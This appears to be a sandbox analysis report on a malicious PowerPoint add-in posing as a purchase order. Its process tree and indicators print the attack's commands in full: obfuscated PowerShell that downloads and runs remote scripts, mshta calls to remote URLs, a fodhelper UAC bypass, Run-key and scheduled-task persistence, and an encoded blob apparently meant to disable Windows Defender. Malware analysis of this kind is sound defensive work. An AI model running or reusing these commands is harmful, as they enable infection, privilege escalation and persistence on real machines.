0e9423c6b3d555a01513b11f32ab37696a240a469b496b64c01069c40e636447

Resubmissions

25-08-2021 09:54

210825-79rzfjvlw2 10

25-08-2021 09:51

210825-tbz8595366 10

28-04-2021 22:50

210428-csmgr8bxe2 10

Analysis

max time kernel
1801s
max time network
1707s
platform
windows10_x64
resource
win10v20210408
submitted
25-08-2021 09:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

PO - CE AUSTRALIA PTY LTD.ppam
Size

10KB
MD5

7c629522213c57c3b3d66ee8e6c13fed
SHA1

352b55636c67a5cd27a998888df0a137ef5433d8
SHA256

a2e98dd3fa146e70b06e95d0cbbf9a831a04e94572a229e6d554372cb6943c04
SHA512

385fbe8c518741e20daf5a62ac6e772d9d7b813e53e2a02b75f32287711c5ca316e162d24b04f48c1a90d799314f330fdc564a3494a27fa3811c1eb87571563b

Score

10^/10

evasion persistence trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://73cceb63-7ecd-45e2-9eab-f8d98aab177f.usrfiles.com/ugd/73cceb_4906e68401a54bdf99cdcca2ef189f9d.txt

Signatures

Contains code to disable Windows Defender 1 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

resource	yara_rule
behavioral1/files/0x000100000001ab86-618.dat	disable_win_def

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089

Process spawned unexpected child process 14 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	4588	4648	mshta.exe	67
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3036	3256	powershell.exe	75
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1692	3256	powershell.exe	75
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1688	3256	powershell.exe	75
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1436	3256	powershell.exe	75
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	936	3256	powershell.exe	75
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1728	3256	powershell.exe	75
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3092	3256	powershell.exe	75
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4500	3256	powershell.exe	75
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4080	3256	powershell.exe	75
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	632	3256	powershell.exe	75
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3592	3256	powershell.exe	75
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	860	3256	powershell.exe	75
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5536	3256	powershell.exe	75

UAC bypass 3 TTPs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112

Blocklisted process makes network request 22 IoCs

flow	pid	Process
31	4588	mshta.exe
33	4588	mshta.exe
35	4588	mshta.exe
37	4588	mshta.exe
39	4588	mshta.exe
41	4588	mshta.exe
43	4588	mshta.exe
45	4588	mshta.exe
46	4588	mshta.exe
48	4588	mshta.exe
50	4588	mshta.exe
52	4588	mshta.exe
53	4588	mshta.exe
54	4588	mshta.exe
56	4588	mshta.exe
58	2132	powershell.exe
60	4104	powershell.exe
62	4104	powershell.exe
65	4104	powershell.exe
66	4104	powershell.exe
67	4104	powershell.exe
68	4104	powershell.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\replcia = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).nasdnasndnad)\|IEX\"\", 0 : window.close\")"	mshta.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
3880	4588	WerFault.exe	82

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	POWERPNT.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	mshta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	mshta.exe

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
4740	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	POWERPNT.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	POWERPNT.EXE

Kills process with taskkill 2 IoCs

evasion

pid	Process
2668	taskkill.exe
4296	taskkill.exe

Modifies registry class 8 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\DelegateExecute	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\ = "C:\\Users\\Public\\batman.bat"	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings	WScript.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
4648	POWERPNT.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2132	powershell.exe
2132	powershell.exe
2132	powershell.exe
3036	powershell.exe
4104	powershell.exe
3036	powershell.exe
4104	powershell.exe
3036	powershell.exe
4104	powershell.exe
3880	WerFault.exe
3880	WerFault.exe
3880	WerFault.exe
3880	WerFault.exe
3880	WerFault.exe
3880	WerFault.exe
3880	WerFault.exe
3880	WerFault.exe
3880	WerFault.exe
3880	WerFault.exe
3880	WerFault.exe
3880	WerFault.exe
3880	WerFault.exe
3880	WerFault.exe
3880	WerFault.exe
3880	WerFault.exe
1692	powershell.exe
1692	powershell.exe
1688	powershell.exe
1688	powershell.exe
1692	powershell.exe
1436	powershell.exe
1436	powershell.exe
1688	powershell.exe
936	powershell.exe
936	powershell.exe
936	powershell.exe
1436	powershell.exe
1692	powershell.exe
1692	powershell.exe
1688	powershell.exe
1728	powershell.exe
1728	powershell.exe
936	powershell.exe
3092	powershell.exe
3092	powershell.exe
1436	powershell.exe
1436	powershell.exe
4500	powershell.exe
4500	powershell.exe
1728	powershell.exe
4080	powershell.exe
4080	powershell.exe
3092	powershell.exe
1728	powershell.exe
1728	powershell.exe
632	powershell.exe
632	powershell.exe
4500	powershell.exe
3092	powershell.exe
3592	powershell.exe
3592	powershell.exe
4080	powershell.exe
632	powershell.exe
860	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2132	powershell.exe
Token: SeDebugPrivilege	3036	powershell.exe
Token: SeDebugPrivilege	4104	powershell.exe
Token: SeDebugPrivilege	2668	taskkill.exe
Token: SeDebugPrivilege	4296	taskkill.exe
Token: SeDebugPrivilege	3880	WerFault.exe
Token: SeDebugPrivilege	1692	powershell.exe
Token: SeDebugPrivilege	1688	powershell.exe
Token: SeDebugPrivilege	1436	powershell.exe
Token: SeDebugPrivilege	936	powershell.exe
Token: SeDebugPrivilege	1728	powershell.exe
Token: SeDebugPrivilege	3092	powershell.exe
Token: SeDebugPrivilege	4500	powershell.exe
Token: SeDebugPrivilege	4080	powershell.exe
Token: SeDebugPrivilege	632	powershell.exe
Token: SeIncreaseQuotaPrivilege	1688	powershell.exe
Token: SeSecurityPrivilege	1688	powershell.exe
Token: SeTakeOwnershipPrivilege	1688	powershell.exe
Token: SeLoadDriverPrivilege	1688	powershell.exe
Token: SeSystemProfilePrivilege	1688	powershell.exe
Token: SeSystemtimePrivilege	1688	powershell.exe
Token: SeProfSingleProcessPrivilege	1688	powershell.exe
Token: SeIncBasePriorityPrivilege	1688	powershell.exe
Token: SeCreatePagefilePrivilege	1688	powershell.exe
Token: SeBackupPrivilege	1688	powershell.exe
Token: SeRestorePrivilege	1688	powershell.exe
Token: SeShutdownPrivilege	1688	powershell.exe
Token: SeDebugPrivilege	1688	powershell.exe
Token: SeSystemEnvironmentPrivilege	1688	powershell.exe
Token: SeRemoteShutdownPrivilege	1688	powershell.exe
Token: SeUndockPrivilege	1688	powershell.exe
Token: SeManageVolumePrivilege	1688	powershell.exe
Token: 33	1688	powershell.exe
Token: 34	1688	powershell.exe
Token: 35	1688	powershell.exe
Token: 36	1688	powershell.exe
Token: SeIncreaseQuotaPrivilege	936	powershell.exe
Token: SeSecurityPrivilege	936	powershell.exe
Token: SeTakeOwnershipPrivilege	936	powershell.exe
Token: SeLoadDriverPrivilege	936	powershell.exe
Token: SeSystemProfilePrivilege	936	powershell.exe
Token: SeSystemtimePrivilege	936	powershell.exe
Token: SeProfSingleProcessPrivilege	936	powershell.exe
Token: SeIncBasePriorityPrivilege	936	powershell.exe
Token: SeCreatePagefilePrivilege	936	powershell.exe
Token: SeBackupPrivilege	936	powershell.exe
Token: SeRestorePrivilege	936	powershell.exe
Token: SeShutdownPrivilege	936	powershell.exe
Token: SeDebugPrivilege	936	powershell.exe
Token: SeSystemEnvironmentPrivilege	936	powershell.exe
Token: SeRemoteShutdownPrivilege	936	powershell.exe
Token: SeUndockPrivilege	936	powershell.exe
Token: SeManageVolumePrivilege	936	powershell.exe
Token: 33	936	powershell.exe
Token: 34	936	powershell.exe
Token: 35	936	powershell.exe
Token: 36	936	powershell.exe
Token: SeDebugPrivilege	3592	powershell.exe
Token: SeIncreaseQuotaPrivilege	1436	powershell.exe
Token: SeSecurityPrivilege	1436	powershell.exe
Token: SeTakeOwnershipPrivilege	1436	powershell.exe
Token: SeLoadDriverPrivilege	1436	powershell.exe
Token: SeSystemProfilePrivilege	1436	powershell.exe
Token: SeSystemtimePrivilege	1436	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4648	POWERPNT.EXE

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
4648	POWERPNT.EXE
4648	POWERPNT.EXE
4648	POWERPNT.EXE
4588	mshta.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 4648 wrote to memory of 4588	4648	POWERPNT.EXE	82
PID 4648 wrote to memory of 4588	4648	POWERPNT.EXE	82
PID 4588 wrote to memory of 2132	4588	mshta.exe	83
PID 4588 wrote to memory of 2132	4588	mshta.exe	83
PID 4588 wrote to memory of 2024	4588	mshta.exe	86
PID 4588 wrote to memory of 2024	4588	mshta.exe	86
PID 4588 wrote to memory of 4740	4588	mshta.exe	88
PID 4588 wrote to memory of 4740	4588	mshta.exe	88
PID 2024 wrote to memory of 4104	2024	cmd.exe	90
PID 2024 wrote to memory of 4104	2024	cmd.exe	90
PID 4588 wrote to memory of 4296	4588	mshta.exe	95
PID 4588 wrote to memory of 4296	4588	mshta.exe	95
PID 4588 wrote to memory of 2668	4588	mshta.exe	94
PID 4588 wrote to memory of 2668	4588	mshta.exe	94
PID 2132 wrote to memory of 2432	2132	powershell.exe	100
PID 2132 wrote to memory of 2432	2132	powershell.exe	100
PID 2432 wrote to memory of 632	2432	WScript.exe	101
PID 2432 wrote to memory of 632	2432	WScript.exe	101
PID 632 wrote to memory of 1836	632	powershell.exe	102
PID 632 wrote to memory of 1836	632	powershell.exe	102
PID 1836 wrote to memory of 3164	1836	Process not Found	104
PID 1836 wrote to memory of 3164	1836	Process not Found	104
PID 3164 wrote to memory of 2036	3164	WScript.exe	105
PID 3164 wrote to memory of 2036	3164	WScript.exe	105

System policy modification 1 TTPs 2 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	WScript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	WScript.exe

C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\PO - CE AUSTRALIA PTY LTD.ppam" /ou ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4648
- C:\Windows\SYSTEM32\mshta.exe
  mshta http://www.j.mp/llsoaskokcdokoktewelvw
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Adds Run key to start application
  - Checks processor information in registry
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4588
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $www='https://73cceb63-7ecd-45e2-9eab-f8d98aab177f.usrfiles.com/ugd/73cceb_4906e68401a54bdf99cdcca2ef189f9d.txt';$sss= '(NESTRDTYUGIHGYFTRDYTFYUbj'.Replace('ESTRDTYUGIHGYFTRDYTFYU','ew-O');$aaa='ecAAAAAAAAAAAm.NBBBBBBBBBBBBBBbC'.Replace('AAAAAAAAAAA','t Syste').Replace('BBBBBBBBBBBBBB','et.We');$bbb='lieCCCCCCCCCCnloaOOOOOOOOOOOOOOOring($www);'.Replace('CCCCCCCCCC','nt).Dow').Replace('OOOOOOOOOOOOOOO','dst');$hbar=I`E`X ($sss,$aaa,$bbb-Join '')|I`E`X;
    3⤵
    - Blocklisted process makes network request
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2132
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Public\kuchb.vbs"
      4⤵
      Modifies registry class
      Suspicious use of WriteProcessMemory
      PID:2432
    - - C:\Windows\System32\fodhelper.exe
        
        "C:\Windows\System32\fodhelper.exe"
        5⤵
        
        PID:632
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Public\batman.bat" "
        6⤵
        
        PID:1836
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Public\clone.vbs"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:3164
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Public\clone.vbs" /elevate
        8⤵
        Checks whether UAC is enabled
        System policy modification
        
        PID:2036
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c start /min PowerShell -ex Bypass -nOp -w 1 ;i'E'x(iwr('https://ia601500.us.archive.org/9/items/FTp-120-May12/19-1.txt') -useB);i'E'x(iwr('https://ia601500.us.archive.org/9/items/FTp-120-May12/19-2.txt') -useB);i'E'x(iwr('https://ia601500.us.archive.org/9/items/FTp-120-May12/19-3.txt') -useB)
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2024
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      PowerShell -ex Bypass -nOp -w 1 ;i'E'x(iwr('https://ia601500.us.archive.org/9/items/FTp-120-May12/19-1.txt') -useB);i'E'x(iwr('https://ia601500.us.archive.org/9/items/FTp-120-May12/19-2.txt') -useB);i'E'x(iwr('https://ia601500.us.archive.org/9/items/FTp-120-May12/19-3.txt') -useB)
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4104
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""MsHtA""\""http://1230948%[email protected]/p/19.html\"
    3⤵
    - Creates scheduled task(s)
    PID:4740
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /f /im winword.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2668
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /f /im Excel.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4296
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 4588 -s 3052
    3⤵
    - Program crash
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3880

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe ((gp HKCU:\Software).nasdnasndnad)|IEX
1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3036

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c $pitllasmd='>>>46>>>56>>>c6>>>26>>>16>>>37>>>96>>>44>>>02>>>56>>>07>>>97>>>45>>>07>>>57>>>47>>>27>>>16>>>47>>>35>>>d2>>>02>>>46>>>e6>>>56>>>66>>>56>>>44>>>e6>>>96>>>75>>>02>>>56>>>d6>>>16>>>e4>>>d2>>>02>>>56>>>36>>>96>>>67>>>27>>>56>>>35>>>d2>>>47>>>56>>>35>>>a0>>>56>>>36>>>27>>>f6>>>64>>>d2>>>02>>>56>>>37>>>c6>>>16>>>66>>>42>>>a3>>>d6>>>27>>>96>>>66>>>e6>>>f6>>>34>>>d2>>>02>>>46>>>e6>>>56>>>66>>>56>>>44>>>e6>>>96>>>75>>>02>>>56>>>d6>>>16>>>e4>>>d2>>>02>>>56>>>36>>>96>>>67>>>27>>>56>>>35>>>d2>>>07>>>f6>>>47>>>35>>>a0>>>46>>>56>>>c6>>>26>>>16>>>37>>>96>>>44>>>02>>>f6>>>47>>>02>>>47>>>96>>>02>>>47>>>56>>>37>>>02>>>46>>>e6>>>16>>>02>>>56>>>36>>>96>>>67>>>27>>>56>>>37>>>02>>>56>>>86>>>47>>>02>>>07>>>f6>>>47>>>37>>>02>>>32>>>a0>>>56>>>36>>>27>>>f6>>>64>>>d2>>>02>>>46>>>27>>>f6>>>75>>>44>>>02>>>56>>>07>>>97>>>45>>>d2>>>02>>>13>>>02>>>56>>>57>>>c6>>>16>>>65>>>d2>>>02>>>22>>>56>>>27>>>16>>>77>>>97>>>07>>>35>>>96>>>47>>>e6>>>14>>>56>>>c6>>>26>>>16>>>37>>>96>>>44>>>22>>>02>>>56>>>d6>>>16>>>e4>>>d2>>>02>>>86>>>47>>>16>>>07>>>76>>>56>>>27>>>42>>>02>>>86>>>47>>>16>>>05>>>d2>>>02>>>97>>>47>>>27>>>56>>>07>>>f6>>>27>>>05>>>d6>>>56>>>47>>>94>>>d2>>>47>>>56>>>35>>>a0>>>d7>>>a0>>>56>>>36>>>27>>>f6>>>64>>>d2>>>02>>>27>>>56>>>e6>>>96>>>16>>>47>>>e6>>>f6>>>34>>>02>>>56>>>07>>>97>>>45>>>d6>>>56>>>47>>>94>>>d2>>>02>>>86>>>47>>>16>>>07>>>76>>>56>>>27>>>42>>>02>>>86>>>47>>>16>>>05>>>d2>>>02>>>d6>>>56>>>47>>>94>>>d2>>>77>>>56>>>e4>>>02>>>02>>>02>>>02>>>a0>>>b7>>>02>>>92>>>92>>>27>>>56>>>e6>>>96>>>16>>>47>>>e6>>>f6>>>34>>>02>>>56>>>07>>>97>>>45>>>86>>>47>>>16>>>05>>>d2>>>02>>>86>>>47>>>16>>>07>>>76>>>56>>>27>>>42>>>02>>>86>>>47>>>16>>>05>>>d2>>>47>>>37>>>56>>>45>>>82>>>12>>>82>>>02>>>66>>>96>>>a0>>>22>>>27>>>56>>>46>>>e6>>>56>>>66>>>56>>>44>>>02>>>37>>>77>>>f6>>>46>>>e6>>>96>>>75>>>c5>>>47>>>66>>>f6>>>37>>>f6>>>27>>>36>>>96>>>d4>>>c5>>>37>>>56>>>96>>>36>>>96>>>c6>>>f6>>>05>>>c5>>>54>>>25>>>14>>>75>>>45>>>64>>>f4>>>35>>>c5>>>a3>>>d4>>>c4>>>b4>>>84>>>22>>>02>>>d3>>>02>>>86>>>47>>>16>>>07>>>76>>>56>>>27>>>42>>>a0>>>a0>>>46>>>e6>>>56>>>35>>>27>>>56>>>67>>>56>>>e4>>>02>>>47>>>e6>>>56>>>37>>>e6>>>f6>>>34>>>37>>>56>>>c6>>>07>>>d6>>>16>>>35>>>47>>>96>>>d6>>>26>>>57>>>35>>>d2>>>02>>>46>>>56>>>c6>>>26>>>16>>>37>>>96>>>44>>>02>>>76>>>e6>>>96>>>47>>>27>>>f6>>>07>>>56>>>25>>>35>>>05>>>14>>>d4>>>d2>>>02>>>56>>>36>>>27>>>f6>>>64>>>d2>>>02>>>56>>>46>>>f6>>>d4>>>47>>>96>>>46>>>57>>>14>>>02>>>e6>>>f6>>>96>>>47>>>36>>>56>>>47>>>f6>>>27>>>05>>>b6>>>27>>>f6>>>77>>>47>>>56>>>e4>>>56>>>c6>>>26>>>16>>>e6>>>54>>>d2>>>02>>>46>>>56>>>c6>>>26>>>16>>>37>>>96>>>44>>>02>>>37>>>37>>>56>>>36>>>36>>>14>>>27>>>56>>>46>>>c6>>>f6>>>64>>>46>>>56>>>c6>>>c6>>>f6>>>27>>>47>>>e6>>>f6>>>34>>>56>>>c6>>>26>>>16>>>e6>>>54>>>d2>>>02>>>56>>>57>>>27>>>47>>>42>>>02>>>76>>>e6>>>96>>>e6>>>e6>>>16>>>36>>>35>>>47>>>07>>>96>>>27>>>36>>>35>>>56>>>c6>>>26>>>16>>>37>>>96>>>44>>>d2>>>02>>>56>>>57>>>27>>>47>>>42>>>02>>>76>>>e6>>>96>>>27>>>f6>>>47>>>96>>>e6>>>f6>>>d4>>>56>>>d6>>>96>>>47>>>c6>>>16>>>56>>>25>>>56>>>c6>>>26>>>16>>>37>>>96>>>44>>>d2>>>02>>>56>>>57>>>27>>>47>>>42>>>02>>>e6>>>f6>>>96>>>47>>>36>>>56>>>47>>>f6>>>27>>>05>>>65>>>14>>>f4>>>94>>>56>>>c6>>>26>>>16>>>37>>>96>>>44>>>d2>>>02>>>56>>>57>>>27>>>47>>>42>>>02>>>d6>>>56>>>47>>>37>>>97>>>35>>>e6>>>f6>>>96>>>47>>>e6>>>56>>>67>>>56>>>27>>>05>>>e6>>>f6>>>96>>>37>>>57>>>27>>>47>>>e6>>>94>>>56>>>c6>>>26>>>16>>>37>>>96>>>44>>>d2>>>02>>>56>>>36>>>e6>>>56>>>27>>>56>>>66>>>56>>>27>>>05>>>07>>>d4>>>d2>>>47>>>56>>>35>>>a0>>>a0>>>37>>>37>>>56>>>36>>>f6>>>27>>>05>>>e6>>>f6>>>96>>>37>>>57>>>c6>>>36>>>87>>>54>>>e2>>>37>>>66>>>56>>>27>>>07>>>42>>>a0>>>86>>>47>>>16>>>05>>>e6>>>f6>>>96>>>37>>>57>>>c6>>>36>>>87>>>54>>>e2>>>37>>>66>>>56>>>27>>>07>>>42>>>a0>>>56>>>36>>>e6>>>56>>>27>>>56>>>66>>>56>>>27>>>05>>>07>>>d4>>>d2>>>47>>>56>>>74>>>02>>>d3>>>02>>>37>>>66>>>56>>>27>>>07>>>42>>>a0>>>a0>>>22>>>a3>>>37>>>e6>>>f6>>>96>>>37>>>57>>>c6>>>36>>>87>>>54>>>02>>>27>>>57>>>f6>>>95>>>22>>>02>>>47>>>37>>>f6>>>84>>>d2>>>56>>>47>>>96>>>27>>>75>>>a0>>>22>>>22>>>02>>>47>>>37>>>f6>>>84>>>d2>>>56>>>47>>>96>>>27>>>75>>>a0>>>a0>>>d7>>>a0>>>e6>>>f6>>>96>>>37>>>57>>>c6>>>36>>>87>>>56>>>42>>>02>>>37>>>37>>>56>>>36>>>f6>>>27>>>05>>>e6>>>f6>>>96>>>37>>>57>>>c6>>>36>>>87>>>54>>>d2>>>02>>>56>>>36>>>e6>>>56>>>27>>>56>>>66>>>56>>>27>>>05>>>07>>>d4>>>d2>>>46>>>46>>>14>>>02>>>02>>>02>>>02>>>a0>>>e6>>>f6>>>96>>>37>>>57>>>c6>>>36>>>87>>>56>>>42>>>02>>>22>>>02>>>a3>>>e6>>>f6>>>96>>>37>>>57>>>c6>>>36>>>87>>>54>>>02>>>37>>>37>>>56>>>36>>>f6>>>27>>>05>>>02>>>76>>>e6>>>96>>>46>>>46>>>14>>>22>>>02>>>47>>>37>>>f6>>>84>>>d2>>>56>>>47>>>96>>>27>>>75>>>02>>>02>>>02>>>02>>>a0>>>b7>>>a0>>>92>>>37>>>e6>>>f6>>>96>>>37>>>57>>>c6>>>36>>>87>>>54>>>37>>>37>>>56>>>36>>>f6>>>27>>>07>>>42>>>02>>>e6>>>96>>>02>>>e6>>>f6>>>96>>>37>>>57>>>c6>>>36>>>87>>>56>>>42>>>82>>>02>>>86>>>36>>>16>>>56>>>27>>>f6>>>66>>>a0>>>a0>>>d7>>>a0>>>e6>>>f6>>>96>>>37>>>57>>>c6>>>36>>>87>>>56>>>42>>>02>>>86>>>47>>>16>>>05>>>e6>>>f6>>>96>>>37>>>57>>>c6>>>36>>>87>>>54>>>d2>>>02>>>56>>>36>>>e6>>>56>>>27>>>56>>>66>>>56>>>27>>>05>>>07>>>d4>>>d2>>>46>>>46>>>14>>>02>>>02>>>02>>>02>>>a0>>>e6>>>f6>>>96>>>37>>>57>>>c6>>>36>>>87>>>56>>>42>>>02>>>22>>>02>>>a3>>>e6>>>f6>>>96>>>37>>>57>>>c6>>>36>>>87>>>54>>>02>>>86>>>47>>>16>>>05>>>02>>>76>>>e6>>>96>>>46>>>46>>>14>>>22>>>02>>>47>>>37>>>f6>>>84>>>d2>>>56>>>47>>>96>>>27>>>75>>>02>>>02>>>02>>>02>>>a0>>>b7>>>a0>>>02>>>92>>>37>>>e6>>>f6>>>96>>>37>>>57>>>c6>>>36>>>87>>>54>>>86>>>47>>>16>>>07>>>42>>>02>>>e6>>>96>>>02>>>e6>>>f6>>>96>>>37>>>57>>>c6>>>36>>>87>>>56>>>42>>>82>>>02>>>86>>>36>>>16>>>56>>>27>>>f6>>>66>>>a0>>>a0>>>37>>>e6>>>f6>>>96>>>37>>>57>>>c6>>>36>>>87>>>54>>>37>>>37>>>56>>>36>>>f6>>>27>>>07>>>42>>>02>>>86>>>47>>>16>>>05>>>e6>>>f6>>>96>>>37>>>57>>>c6>>>36>>>87>>>54>>>d2>>>02>>>56>>>36>>>e6>>>56>>>27>>>56>>>66>>>56>>>27>>>05>>>07>>>d4>>>d2>>>46>>>46>>>14>>>a0>>>a0>>>a0>>>a0>>>c6>>>c6>>>57>>>e6>>>42>>>02>>>e3>>>02>>>92>>>72>>>56>>>87>>>56>>>e2>>>47>>>07>>>96>>>27>>>36>>>37>>>77>>>72>>>82>>>46>>>46>>>14>>>e2>>>37>>>e6>>>f6>>>96>>>37>>>57>>>c6>>>36>>>87>>>54>>>37>>>37>>>56>>>36>>>f6>>>27>>>07>>>42>>>a0>>>c6>>>c6>>>57>>>e6>>>42>>>02>>>e3>>>02>>>92>>>72>>>56>>>87>>>56>>>e2>>>46>>>d6>>>36>>>72>>>82>>>46>>>46>>>14>>>e2>>>37>>>e6>>>f6>>>96>>>37>>>57>>>c6>>>36>>>87>>>54>>>37>>>37>>>56>>>36>>>f6>>>27>>>07>>>42>>>a0>>>c6>>>c6>>>57>>>e6>>>42>>>02>>>e3>>>02>>>92>>>72>>>56>>>87>>>56>>>e2>>>47>>>37>>>f6>>>86>>>e6>>>f6>>>36>>>72>>>82>>>46>>>46>>>14>>>e2>>>37>>>e6>>>f6>>>96>>>37>>>57>>>c6>>>36>>>87>>>54>>>37>>>37>>>56>>>3